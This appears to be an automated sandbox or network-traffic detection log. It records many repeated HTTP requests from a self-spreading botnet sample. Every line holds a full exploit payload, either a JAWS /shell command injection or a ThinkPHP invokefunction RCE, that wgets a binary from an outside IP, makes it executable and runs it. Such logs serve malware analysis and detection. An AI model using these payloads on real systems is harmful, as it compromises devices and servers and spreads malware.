      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
